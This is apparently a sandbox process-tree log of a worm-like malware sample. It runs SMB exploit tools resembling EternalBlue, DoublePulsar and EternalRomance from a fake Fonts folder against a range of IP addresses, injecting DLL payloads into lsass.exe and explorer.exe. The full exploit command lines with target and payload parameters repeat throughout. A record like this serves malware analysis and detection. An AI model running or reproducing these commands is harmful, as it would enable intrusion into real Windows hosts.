-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.4.91 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.4.91.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:7876
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.4.91 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:5916
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.4.91 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:7500
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.4.91 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵
- Drops file in Windows directory
PID:5480
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.4.91 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:7704
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.4.91 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:10120
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.4.91 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.4.91.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:9504
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.4.91 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵
- System Location Discovery: System Language Discovery
PID:10188
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.4.91 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:6808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.4.1013⤵PID:5692
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.4.101 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.4.101.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵
- System Time Discovery
PID:4312
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.4.101 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.4.101.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:412
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.4.101 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:6876
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.4.101 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵
- System Location Discovery: System Language Discovery
PID:3076
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.4.101 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:3384
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.4.101 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:7116
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.4.101 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9540
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.4.101 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.4.101.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- Drops file in Windows directory
PID:9684
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.4.101 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:10232
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.4.101 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵
- Drops file in Windows directory
PID:7796
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.4.1883⤵PID:7724
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.4.188 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.4.188.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:5148
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.4.188 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.4.188.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:7508
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.4.188 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:5176
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.4.188 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:4212
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.4.188 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵
- System Location Discovery: System Language Discovery
PID:5856
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.4.188 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵
- System Location Discovery: System Language Discovery
PID:8568
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.4.188 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9940
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.4.188 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.4.188.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:5796
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.4.188 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9340
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.4.188 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:4768
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.4.2053⤵PID:6916
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.4.205 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.4.205.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵
- Drops file in Windows directory
PID:5936
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.4.205 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.4.205.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:8096
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.4.205 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:1364
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.4.205 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:5916
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.4.205 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵
- System Time Discovery
PID:5160
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.5.43⤵PID:5900
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.5.4 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.5.4.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:5944
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.5.4 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.5.4.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Time Discovery
PID:304
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.5.4 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:992
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.5.4 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:7848
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.5.4 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵
- System Time Discovery
PID:2404
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.5.4 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵
- Drops file in Windows directory
PID:8876
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.5.4 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵
- Drops file in Windows directory
PID:9088
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.5.4 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.5.4.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Time Discovery
PID:9688
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.5.4 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9016
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.5.4 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9920
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.5.103⤵PID:5132
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.5.10 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.5.10.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:5800
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.5.10 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.5.10.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Time Discovery
PID:5224
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.5.10 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:2272
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.5.10 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:7468
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.5.10 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵
- System Time Discovery
PID:1956
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.5.10 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9016
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.5.10 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:8916
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.5.10 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.5.10.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:8216
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.5.10 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9932
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.5.10 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9316
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.5.183⤵PID:6228
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.5.18 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.5.18.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:1912
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.5.18 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.5.18.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:7680
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.5.18 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:4436
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.5.18 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵
- System Location Discovery: System Language Discovery
PID:2128
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.5.18 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:4568
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.5.18 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:7096
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.5.18 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:6632
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.5.18 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.5.18.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Time Discovery
PID:9956
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.5.18 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9768
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.5.18 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9956
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.5.513⤵PID:7956
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.5.51 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.5.51.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵
- System Time Discovery
PID:7688
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.5.51 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.5.51.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:2852
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.5.51 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:6908
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.5.51 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:6340
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.5.51 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:6096
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.5.51 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:8924
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.5.51 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:8408
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.5.51 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.5.51.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:9716
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.5.51 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:2032
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.5.51 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵
- Drops file in Windows directory
PID:9256
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.1 -n 383⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.5.473⤵PID:9660
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.5.47 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.5.47.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:12128
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.5.47 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.5.47.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Location Discovery: System Language Discovery
PID:10592
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.5.47 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9684
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.5.47 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:11116
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.5.47 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵
- System Time Discovery
PID:11268
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.5.47 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:5436
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.5.47 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:8760
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.5.47 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.5.47.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:7656
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.5.47 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:8908
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.5.47 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵
- System Location Discovery: System Language Discovery
PID:9404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.5.493⤵PID:10208
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.5.49 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.5.49.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:11336
-
-
